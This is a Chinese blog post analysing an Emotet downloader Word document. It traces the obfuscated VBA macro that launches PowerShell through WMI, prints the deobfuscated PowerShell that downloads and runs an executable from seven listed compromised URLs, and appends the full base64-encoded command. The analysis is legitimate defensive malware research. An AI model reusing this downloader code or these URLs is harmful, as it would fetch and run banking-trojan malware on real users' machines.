记一次Emotet木马下载器的分析

最新推荐文章于 2023-06-14 10:29:23 发布
最新推荐文章于 2023-06-14 10:29:23 发布
阅读量1.4k 收藏
点赞数
分类专栏: 恶意样本分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jxz_dz/article/details/115300732
版权

Part 1:

 

简要流程:

1. Sub Document_open()执行代码调用O15ho2roxnv7ybuidx.H4b0154n64u

2.1 H4b0154n64u调用

Fl5n0bbcb9wio()返回值: "winmgmts:win32_Process"

2.2 H4b0154n64u 调用

W1ux0__6p4lqepk = CreateObject(G0yh3lf7156ae)

2.3 H4b0154n64u 调用

Set Nw0s5mi0i4948 = W7iyiz8spoc91mo(Sl2cm7hs735 + O15ho2roxnv7ybuidx.Axht6x94x6zh3vbij)             

获得// CreateObject "winmgmts:win32_ProcessstartuP"

2.4 H4b0154n64u 调用

W1ux0__6p4lqepk.Create Wlu43k5ugcf, Vf6mjdhloae576t, Nw0s5mi0i4948

2.4.1 Wlu43k5ugcf为函数名,调用Wlu43k5ugcf = Fl5n0bbcb9wio(F2ehdobzqp8u)

              取得powershell代码.启动了powershell,vb代码运行完毕

 

 

详细分析:

1.Sub Document_open()调用O15ho2roxnv7ybuidx.H4b0154n64u

2. O15ho2roxnv7ybuidx.H4b0154n64函数一共几个功能:

 

         2.1 G0yh3lf7156ae = Fl5n0bbcb9wio(Viwkwysmsx4anz0wt4)

         调用Fl5n0bbcb9wio,传入的参数是Viwkwysmsx4anz0wt4(下边第二个图):

              /*": ue, s:: ue, s:w: ue, s:i: ue, s:nm: ue, s:: ue, s:gm: ue, s:t: ue, s:: ue, s:s: ue, s:: ue, s::: ue, s:w: ue, s:in: ue, s:: ue, s:3: ue, s:2: ue, s:_: ue, s:P: ue, s:ro: ue, s:: ue, s:ce: ue, s:s: ue, s:s: ue, s:"*/

 

 

 

函数Fl5n0bbcb9wio()功能:

 

         至此函数Fl5n0bbcb9wio()返回值: "winmgmts:win32_Process"

 

 

 

 

 

 

         2.2   将返回值: "winmgmts:win32_Process"为参数 创建object,

Set W1ux0__6p4lqepk = CreateObject(G0yh3lf7156ae),详细信息如下:

 

        

 

 

2.3 调用函数W7iyiz8spoc91mo()

Set Nw0s5mi0i4948 = W7iyiz8spoc91mo(Sl2cm7hs735 + O15ho2roxnv7ybuidx.Axht6x94x6zh3vbij)              //"winmgmts:win32_ProcessstartuP"

 

W7iyiz8spoc91mo()函数功能:

Set W7iyiz8spoc91mo = CreateObject(Rcc0m4zmrlen_tlmqb)                   //"winmgmts:win32_ProcessstartuP"

W7iyiz8spoc91mo. _showwindow = wdKeyEquals - wdKeyEquals

 

 

2.4 W1ux0__6p4lqepk.Create Wlu43k5ugcf, Vf6mjdhloae576t, Nw0s5mi0i4948

其中:

W1ux0__6p4lqepk = CreateObject(G0yh3lf7156ae)          //win32_process

Wlu43k5ugcf是一个函数名,

Vf6mjdhloae576t为空,

Nw0s5mi0i4948为: Set Nw0s5mi0i4948 = W7iyiz8spoc91mo(Sl2cm7hs735 + O15ho2roxnv7ybuidx.Axht6x94x6zh3vbij)  //"winmgmts:win32_ProcessstartuP"

 

 

2.4.1 函数:Wlu43k5ugcf()功能概览

                   1 .Set G1myonmyip_ = Uuebqrha3c2.Content       

//该模块如图所示:

其content为:

/*": ue, s:: ue, s:w: ue, s:i: ue, s:nm: ue, s:: ue, s:gm: ue, s:t: ue, s:: ue, s:s: ue, s:: ue, s::: ue, s:w: ue, s:in: ue, s:: ue, s:3: ue, s:2: ue, s:_: ue, s:P: ue, s:ro: ue, s:: ue, s:ce: ue, s:s: ue, s:s: ue, s:"*/

 

2.F2ehdobzqp8u = Right(G1myonmyip_.Text, Len(G1myonmyip_.Text) - 1)

                   3. Wlu43k5ugcf = Fl5n0bbcb9wio(F2ehdobzqp8u)

 

 

 

Function Fl5n0bbcb9wio(Q2si2nw66sivcs2zr)函数如下:

出现了敏感字符串: POwersheLL -ENCOD ABFAGgAZQBmADUAO……., 和文首的processmonitor截图中出现的powershell启动相同的字符串:

 

 

         至此Fl5n0bbcb9wio返回的是字符串POwersheLL -ENCOD ABFAGgAZQBmADUAO…….

即Wlu43k5ugcf = Fl5n0bbcb9wio(F2ehdobzqp8u),即Wlu43k5ugcf函数的功能为获得关键字符串POwersheLL -ENCOD JABFAGgAZQBmADUAO…….

        

回到2.4

W1ux0__6p4lqepk.Create Wlu43k5ugcf, Vf6mjdhloae576t, Nw0s5mi0i4948

其中:

W1ux0__6p4lqepk = CreateObject(G0yh3lf7156ae)          //win32_process

Wlu43k5ugcf是一个函数名,

Vf6mjdhloae576t为空,

Nw0s5mi0i4948为: Set Nw0s5mi0i4948 = W7iyiz8spoc91mo(Sl2cm7hs735 + O15ho2roxnv7ybuidx.Axht6x94x6zh3vbij)  //"winmgmts:win32_ProcessstartuP"

 

由此得出结论:

运行了powershell代码.往回追溯得出运行过程:

 

 

 

1. Sub Document_open()执行代码调用O15ho2roxnv7ybuidx.H4b0154n64u

2.1 H4b0154n64u调用

Fl5n0bbcb9wio()返回值: "winmgmts:win32_Process"

2.2 H4b0154n64u 调用

W1ux0__6p4lqepk = CreateObject(G0yh3lf7156ae)

2.3 H4b0154n64u 调用

Set Nw0s5mi0i4948 = W7iyiz8spoc91mo(Sl2cm7hs735 + O15ho2roxnv7ybuidx.Axht6x94x6zh3vbij)   

获得// CreateObject "winmgmts:win32_ProcessstartuP"

2.4 H4b0154n64u 调用

W1ux0__6p4lqepk.Create Wlu43k5ugcf, Vf6mjdhloae576t, Nw0s5mi0i4948

 

2.4.1 Wlu43k5ugcf为函数名,调用Wlu43k5ugcf = Fl5n0bbcb9wio(F2ehdobzqp8u)

              取得powershell代码.启动了powershell, Vf6mjdhloae576t为空, Nw0s5mi0i4948没发现啥作用.

至此运行完毕.powershell代码来源于最终来源于Uuebqrha3c2.Content        

 

 

 

下边分析powershell字符串:

 

Part 2:

 

Powershell代码解密后如下:

 

$Ehef59i=(('Z'+'s5')+'0'+('d5'+'b'));

&('ne'+'w'+'-item')

$Env:UserpROfIle\I2byDoI\ejo26QD\-itemtypeDIRECtory;

[Net.ServicePointManager]::"S`e`cUri`TyProtOcol"=(('tl'+'s12')+(',tls'+'1')+('1'+',')+'tl'+'s');              #tls12,tls11,tls

$F3ysqov=(('P'+'_lu')+'l'+('vp'+'1'));                                                                        

$Mlop803=('F'+('nj'+'kp8o'));                                                                                                  

$Dglrx5x=$env:userprofile+(('{0}I2'+'by'+('do'+'i')+'{0}'+('E'+'jo')+'26qd{'+'0'+'}')-f[CHar]92)+$F3ysqov+('.'+('ex'+'e'));               

#C:\Users\Administrator\I2bydoi\Ejo26qd\.exe

$Ezwvj1m=(('We'+'7')+'e'+('t'+'ev'));                                                                                                   

$Up2imep=&('new-'+'ob'+'ject')Net.wEbCLient;

#创建Net.wEbCLient对象

$Swkc22m=('ht'+'t'+'p'+':'+('/'+'/www.f'+'i')+'r'+('hajs'+'h')+('o'+'es.co'+'m/w')+'p'+'-a'+'d'+'m'+'i'+'n/'+'R'+'g'+'ai'+'T/'+('*h'+'tt')+'p:'+'//'+('fak'+'e')+('r'+'ea')+'d'+('.c'+'o')+('m/'+'O')+('n'+'eSi'+'gn'+'al-W'+'eb-S'+'DK-')+'H'+'T'+'T'+'PS'+('-'+'In')+('tegra'+'ti')+('on-Fil'+'es/')+('Wf/'+'*')+'h'+('t'+'tp:/')+'/'+('w'+'ww.')+'r'+('tt'+'utori')+('ng.c'+'om')+'/'+('w'+'p-i')+('n'+'clud')+('es/'+'Ll')+('bY'+'6o')+('/*h'+'t')+('tp'+'://b')+('lu'+'e')+'s'+'k'+('y'+'sol.')+('co'+'m')+'/s'+'ys'+'-'+('c'+'ach')+('e/'+'2R')+('k'+'/*ht')+('tp:'+'//cr')+('az'+'yboxs.'+'com/')+('cg'+'i')+'-'+'b'+'in'+('/I'+'aJ/'+'*ht')+('t'+'p:')+'//'+('w'+'ww')+('.pa'+'ram'+'e')+'di'+('cale'+'d'+'ucati'+'ongui')+'de'+'l'+('i'+'nes.c')+('o'+'m/')+('w'+'p-')+('ad'+'min')+('/3j'+'XU')+'5B'+('p'+'/*h')+'tt'+('p'+'://')+'n'+'uh'+('at'+'oys.c')+('o'+'m/wp')+'-'+('a'+'dmi')+('n/'+'WW')+('A4R'+'/'))."sPl`IT"([char]42);$Khmx6rc=('Bk'+('7r4'+'j')+'h');

#共有七个下载链接,其中有三个可以下载成功,均为Emotet木马,md5如下:

#http://www.firhajshoes.com/wp-admin/RgaiT/               

#可以下载      4c613753d03629fcea945d7ab1289f78

#http://fakeread.com/OneSignal-Web-SDK-HTTPS-Integration-Files/Wf/

#http://www.rttutoring.com/wp-includes/LlbY6o/

#http://blueskysol.com/sys-cache/2Rk/

#http://crazyboxs.com/cgi-bin/IaJ/                                         

#可以下载      04a8af949217a0e53629de69ad9574ef

#http://www.paramedicaleducationguidelines.com/wp-admin/3jXU5Bp/         

#可以下载      41dedfcd2321b9ad762f7aadb4d3e190

#http://nuhatoys.com/wp-admin/WWA4R/

 

 

 

 

 

foreach($Ygzxknjin$Swkc22m)

{try

              {

                            $Up2imep."DOW`NlO`ADf`iLe"($Ygzxknj,$Dglrx5x);

                            $Ycf84fz=(('Zg'+'u3')+('d'+'yf'));                                     #Zgu3dyf

                            If((&('G'+'et-'+'Item')$Dglrx5x)."l`enGtH"-ge21773)          

#length>21773,疑似判断是否下载完

                                          {

                                                        .('Invo'+'ke-Ite'+'m')($Dglrx5x);       

#InvokeItem 对指定的项目执行默认操作,即执行C:\Users\Administrator\I2bydoi\Ejo26qd\.exe

                                                       $L7hv3yz=('C'+('t_'+'66pw'));                           #Ct_66pw

                                                        break;

                                                        $Uhr0y_j=(('Ox'+'y')+('8k'+'p')+'o')  #Oxy8kpo

                                          }

              }

              catch{}

}

$Uzmn_sg=(('Mk'+'1xz8')+'e')                                                                                 #Mk1xz8e

 

 

总结: word文档利用vb代码生成powershell代码并执行, 下载多个银行木马Trojan/Win32.Emotet并运行.

 

 

附:

Command line:            POwersheLL -ENCOD                 JABFAGgAZQBmADUAOQBpAD0AKAAoACcAWgAnACsAJwBzADUAJwApACsAJwAwACcAKwAoACcAZAA1ACcAKwAnAGIAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAG4AdgA6AFUAcwBlAHIAcABSAE8AZgBJAGwAZQBcAEkAMgBiAHkARABvAEkAXABlAGoAbwAyADYAUQBEAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQASQBSAEUAQwB0AG8AcgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAGMAVQByAGkAYABUAHkAUAByAG8AdABPAGMAbwBsACIAIAA9ACAAKAAoACcAdABsACcAKwAnAHMAMQAyACcAKQArACgAJwAsACAAdABsAHMAJwArACcAMQAnACkAKwAoACcAMQAnACsAJwAsACAAJwApACsAJwB0AGwAJwArACcAcwAnACkAOwAkAEYAMwB5AHMAcQBvAHYAIAA9ACAAKAAoACcAUAAnACsAJwBfAGwAdQAnACkAKwAnAGwAJwArACgAJwB2AHAAJwArACcAMQAnACkAKQA7ACQATQBsAG8AcAA4ADAAMwA9ACgAJwBGACcAKwAoACcAbgBqACcAKwAnAGsAcAA4AG8AJwApACkAOwAkAEQAZwBsAHIAeAA1AHgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0ASQAyACcAKwAnAGIAeQAnACsAKAAnAGQAbwAnACsAJwBpACcAKQArACcAewAwAH0AJwArACgAJwBFACcAKwAnAGoAbwAnACkAKwAnADIANgBxAGQAewAnACsAJwAwACcAKwAnAH0AJwApACAAIAAtAGYAWwBDAEgAYQByAF0AOQAyACkAKwAkAEYAMwB5AHMAcQBvAHYAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABFAHoAdwB2AGoAMQBtAD0AKAAoACcAVwBlACcAKwAnADcAJwApACsAJwBlACcAKwAoACcAdAAnACsAJwBlAHYAJwApACkAOwAkAFUAcAAyAGkAbQBlAHAAPQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBFAGIAQwBMAGkAZQBuAHQAOwAkAFMAdwBrAGMAMgAyAG0APQAoACcAaAB0ACcAKwAnAHQAJwArACcAcAAnACsAJwA6ACcAKwAoACcALwAnACsAJwAvAHcAdwB3AC4AZgAnACsAJwBpACcAKQArACcAcgAnACsAKAAnAGgAYQBqAHMAJwArACcAaAAnACkAKwAoACcAbwAnACsAJwBlAHMALgBjAG8AJwArACcAbQAvAHcAJwApACsAJwBwACcAKwAnAC0AYQAnACsAJwBkACcAKwAnAG0AJwArACcAaQAnACsAJwBuAC8AJwArACcAUgAnACsAJwBnACcAKwAnAGEAaQAnACsAJwBUAC8AJwArACgAJwAqAGgAJwArACcAdAB0ACcAKQArACcAcAA6ACcAKwAnAC8ALwAnACsAKAAnAGYAYQBrACcAKwAnAGUAJwApACsAKAAnAHIAJwArACcAZQBhACcAKQArACcAZAAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACgAJwBtAC8AJwArACcATwAnACkAKwAoACcAbgAnACsAJwBlAFMAaQAnACsAJwBnAG4AJwArACcAYQBsAC0AVwAnACsAJwBlAGIALQBTACcAKwAnAEQASwAtACcAKQArACcASAAnACsAJwBUACcAKwAnAFQAJwArACcAUABTACcAKwAoACcALQAnACsAJwBJAG4AJwApACsAKAAnAHQAZQBnAHIAYQAnACsAJwB0AGkAJwApACsAKAAnAG8AbgAtAEYAaQBsACcAKwAnAGUAcwAvACcAKQArACgAJwBXAGYALwAnACsAJwAqACcAKQArACcAaAAnACsAKAAnAHQAJwArACcAdABwADoALwAnACkAKwAnAC8AJwArACgAJwB3ACcAKwAnAHcAdwAuACcAKQArACcAcgAnACsAKAAnAHQAdAAnACsAJwB1AHQAbwByAGkAJwApACsAKAAnAG4AZwAuAGMAJwArACcAbwBtACcAKQArACcALwAnACsAKAAnAHcAJwArACcAcAAtAGkAJwApACsAKAAnAG4AJwArACcAYwBsAHUAZAAnACkAKwAoACcAZQBzAC8AJwArACcATABsACcAKQArACgAJwBiAFkAJwArACcANgBvACcAKQArACgAJwAvACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAJwArACcAOgAvAC8AYgAnACkAKwAoACcAbAB1ACcAKwAnAGUAJwApACsAJwBzACcAKwAnAGsAJwArACgAJwB5ACcAKwAnAHMAbwBsAC4AJwApACsAKAAnAGMAbwAnACsAJwBtACcAKQArACcALwBzACcAKwAnAHkAcwAnACsAJwAtACcAKwAoACcAYwAnACsAJwBhAGMAaAAnACkAKwAoACcAZQAvACcAKwAnADIAUgAnACkAKwAoACcAawAnACsAJwAvACoAaAB0ACcAKQArACgAJwB0AHAAOgAnACsAJwAvAC8AYwByACcAKQArACgAJwBhAHoAJwArACcAeQBiAG8AeABzAC4AJwArACcAYwBvAG0ALwAnACkAKwAoACcAYwBnACcAKwAnAGkAJwApACsAJwAtACcAKwAnAGIAJwArACcAaQBuACcAKwAoACcALwBJACcAKwAnAGEASgAvACcAKwAnACoAaAB0ACcAKQArACgAJwB0ACcAKwAnAHAAOgAnACkAKwAnAC8ALwAnACsAKAAnAHcAJwArACcAdwB3ACcAKQArACgAJwAuAHAAYQAnACsAJwByAGEAbQAnACsAJwBlACcAKQArACcAZABpACcAKwAoACcAYwBhAGwAZQAnACsAJwBkACcAKwAnAHUAYwBhAHQAaQAnACsAJwBvAG4AZwB1AGkAJwApACsAJwBkAGUAJwArACcAbAAnACsAKAAnAGkAJwArACcAbgBlAHMALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACkAKwAoACcAdwAnACsAJwBwAC0AJwApACsAKAAnAGEAZAAnACsAJwBtAGkAbgAnACkAKwAoACcALwAzAGoAJwArACcAWABVACcAKQArACcANQBCACcAKwAoACcAcAAnACsAJwAvACoAaAAnACkAKwAnAHQAdAAnACsAKAAnAHAAJwArACcAOgAvAC8AJwApACsAJwBuACcAKwAnAHUAaAAnACsAKAAnAGEAdAAnACsAJwBvAHkAcwAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHcAcAAnACkAKwAnAC0AJwArACgAJwBhACcAKwAnAGQAbQBpACcAKQArACgAJwBuAC8AJwArACcAVwBXACcAKQArACgAJwBBADQAUgAnACsAJwAvACcAKQApAC4AIgBzAFAAbABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEsAaABtAHgANgByAGMAPQAoACcAQgBrACcAKwAoACcANwByADQAJwArACcAagAnACkAKwAnAGgAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAWQBnAHoAeABrAG4AagAgAGkAbgAgACQAUwB3AGsAYwAyADIAbQApAHsAdAByAHkAewAkAFUAcAAyAGkAbQBlAHAALgAiAEQATwBXAGAATgBsAE8AYABBAEQAZgBgAGkATABlACIAKAAkAFkAZwB6AHgAawBuAGoALAAgACQARABnAGwAcgB4ADUAeAApADsAJABZAGMAZgA4ADQAZgB6AD0AKAAoACcAWgBnACcAKwAnAHUAMwAnACkAKwAoACcAZAAnACsAJwB5AGYAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQARABnAGwAcgB4ADUAeAApAC4AIgBsAGAAZQBuAEcAdABIACIAIAAtAGcAZQAgADIAMQA3ADcAMwApACAAewAuACgAJwBJAG4AdgBvACcAKwAnAGsAZQAtAEkAdABlACcAKwAnAG0AJwApACgAJABEAGcAbAByAHgANQB4ACkAOwAkAEwANwBoAHYAMwB5AHoAPQAoACcAQwAnACsAKAAnAHQAXwAnACsAJwA2ADYAcAB3ACcAKQApADsAYgByAGUAYQBrADsAJABVAGgAcgAwAHkAXwBqAD0AKAAoACcATwB4ACcAKwAnAHkAJwApACsAKAAnADgAawAnACsAJwBwACcAKQArACcAbwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUAegBtAG4AXwBzAGcAPQAoACgAJwBNAGsAJwArACcAMQB4AHoAOAAnACkAKwAnAGUAJwApAA==

 

独木_DZ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
超级BT木马下载 Gameservet.exe的分析 game1.exe 8888-521ww.exe qjso.exe
飘的梦客厅
05-21 5491
  今天接到了一个叫Gameservet.exe的样本 测试了一下 测试结果真的让人震惊 这是个超级变态的木马下载当今流行的木马几乎都全了 而且最后还捣登出来个威金来 哎 现在的病毒都太厉害 那些无耻的制造病毒者 你们还让人活么?!越来越多的这类案例提示:每个用户应该做好自己系统的防护。不能仅仅指望一两款杀软保护自己系统的安全。对于病毒,防远重于杀。by baohe下面就说说测试过程:F
Emotet银行木马分析
信息安全
02-28 2324
文章目录前言样本运行流程样本分析宏文档分析恶意downloader分析窃密程序分析yara规则IOC 前言 Emotet是现如今流行的银行木马之一,变种极多,使用的混淆也各不相同。Emotet主要以垃圾邮件传播,邮件中的宏文档是被用作后续下载Emotet进行持久化攻击的Downloader。此文是以1月份获取的变种样本进行分析。 样本运行流程 样本分析 宏文档分析 打开文档,文档中的图片诱导用...
画图工具的VB实现
keenweiwei的专栏
11-23 6610
 ‘用户可以随意的用mouse画图,也可以引入图片,然后进行简单的处理,主要是添加两个picture控件 和几个按钮 (程序运行界面已上传到相册VB6中)Dim x1!, v1!, x2!, v2!, a1!Private Sub Command1_Click()                 清屏的按钮Picture2.Cls               清屏End SubPri
maven gav
彻底拆分,一切可控!
11-09 1万+
groupId: 项目名称,是项目组织唯一的标识符,实际对应JAVA的包的结构,是main目录里java的目录结构。 artifactId: 模块名称,就是模块的唯一的标识符,实际对应项目的名称,就是项目根目录的名称。 version: 就是项目的版本 举例: springframework 里面包含了许多的模块,但是它们都属于 org.springframework 下...
springboot项目接口查看swagger文档
火焰云的博客
01-21 3684
1、引入gav如下 <dependency> <groupId>io.swagger</groupId> <artifactId>swagger-models</artifactId> <version>1.6.2</version> </dependency> <dependency> <groupId>io.swagger</groupId> <artif
一次Linux服务被hack的过程分析
01-31
最近遇到一个服务被hack的问题,服务变成了肉机,不断尝试破解其他机的帐号。下面我们通过分析黑客在服务上留下的工具,了解入门的hack方法、学习相应的防范措施。hacker登入一台被入侵的服务,通常首先...
一句话木马要点和防范注意事项
最新发布
05-24
"一句话木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件中,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务权限的目的。这类木马因为其简洁高效的特点...
一次入侵Linux服务和删除木马程序的经历
09-15
主要介绍了一次入侵Linux服务和删除木马程序的经历的相关资料,需要的朋友可以参考下
QQ漫游下载
04-19
QQ漫游下载是一款工具软件,主要用于获取和下载QQ用户的聊天录,这些录可能包括了漫游消息,即用户在不同设备上登录QQ时发送和接收的信息。漫游录通常是为了方便用户在更换设备或者丢失原有设备后,仍然...
下载木马专杀工具.rar
08-09
下载木马是一种恶意软件,通常通过伪装成合法的下载链接或软件,诱导用户下载并执行,从而在用户的计算机上安装其他恶意程序或病毒。这些下载不仅可能盗取个人信息,还可能导致系统性能下降,甚至破坏数据。面对...
SM的开发步骤
Lecheng_的博客
05-18 2570
SM的开发步骤 1、在中央库提供的web应用中查询依赖的GAV坐标值 spring-context-support提供Spring的IoC容 spring-jdbc提供Spring针对JDBC编程的支持,并按照传递依赖自动添加spring-tx事务支持 spring-web提供spring针对web编程的支持 mybatis声明依赖mybatis框架 mybatis-spring整合Spring和MyBatis框架 HikariCP提供连接池依赖 ojdbc8是oracle11g的jar包 为了解决默
基于ajaxFileUpload,兼容ie7以上、chrome等浏览的文件上传功能
weixin_33897722的博客
12-23 202
第一步:html中引入jQuery-1.7.1.js和ajaxFileUpload.js 1 <!DOCTYPE html> 2 <html xmlns="http://www.w3.org/1999/xhtml"> 3 <head> 4 <title>企业年金数据校验平台</title> 5 &l...
Maven 超级pom、最终有效pom、pom 详解、settings 详解
Ares5k
06-14 2356
Maven 超级pom、最终有效pom、pom 详解、settings 详解
烟花特效Html
热门推荐
大宽的博客
03-02 4万+
【代码】烟花特效Html。
【3天掌握Spark】-- IDEA 应用开发Spark
weixin_48143996的博客
05-21 1229
IDEA 应用开发Spark 构建Maven Project 创建Maven Project工程【bigdata-spark_2.11】,设置GAV三要素的值如下: 创建Maven Module模块【spark-chapter01_2.11】,对应的GAV三要素值如下: 至此,将Maven Module模块创建完成,可以开始编写第一个Spark程序。 应用入口SparkContext Spark Application程序入口为:SparkContext,任何一个应用首先需要构建SparkContex
《Windows-Program:Win32/Contebrew.A!ml 病毒》
小霸王的博客
11-10 2300
Program:Win32/Contebrew.A!ml 这个病毒怎么解决?
Trojan-Downloader.Win32.Agent.bbb 木马手动查杀
unixtux的专栏
07-24 992
这个木马是卡巴斯基发现的,每次开机卡巴斯基就会出现提示有木马,但是点击处理所有删除它电脑就会重启,重启完后卡巴斯基有会有相同的提示,依然重启,我实在是解决不了,通过网上才知道是这个木马,卡巴是杀不掉的,只能发现,想想发现也行,毕竟卡巴是杀毒软件,不是木马专杀,总有解决的办法,网上的说法各部相同,经我反复思考还是把它解决了。 网上说 Trojan-Downloader.Win32...
木马下载Trojan-Downloader.Win32.Small.nkb
04-13 2422
捕获时间2008-04-12病毒症状该程序是使用VC编写的下载程序,由微点主动防御软件自动捕获,采用UPX加壳方式试图躲避特征码扫描,加壳后长度为8,704字节,图标为Windows默认可执行文件图标,病毒扩展名为exe,主要通过网页木马、文件捆绑的方式传播。病毒分析木马程序被执行后,拷贝自身到%SystemRoot%/system32目录下,修改文件创建时间以及修改时间;通过API函数Crea
简单IE浏览的VB实现
keenweiwei的专栏
11-23 1162
’添加一个webbrowse控件和几个按钮,少量的代码,就可以实现简单的IE浏览            (程序运行界面已上传至相册VB6) Private Sub Command1_Click(Index As Integer) Select Case Index   Case 0trip:        WebBrowser1.Stop                         
M钓鱼邮件 ↓附件 带毒宏文档↓启动 powershell命 令行↓下载执行 0 Emotet木马下载执行 更新 中间谍木马模块 将以上病毒代码执行流程描述成文字过程
06-06
5. Emotet木马还会下载并执行中间谍木马模块,以便攻击者能够窃取系统中的敏感数据和信息。 总之,这种病毒代码的执行流程非常隐蔽和危险,用户必须保持警惕,避免打开不明来源的附件以及及时更新其计算机的防病毒...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值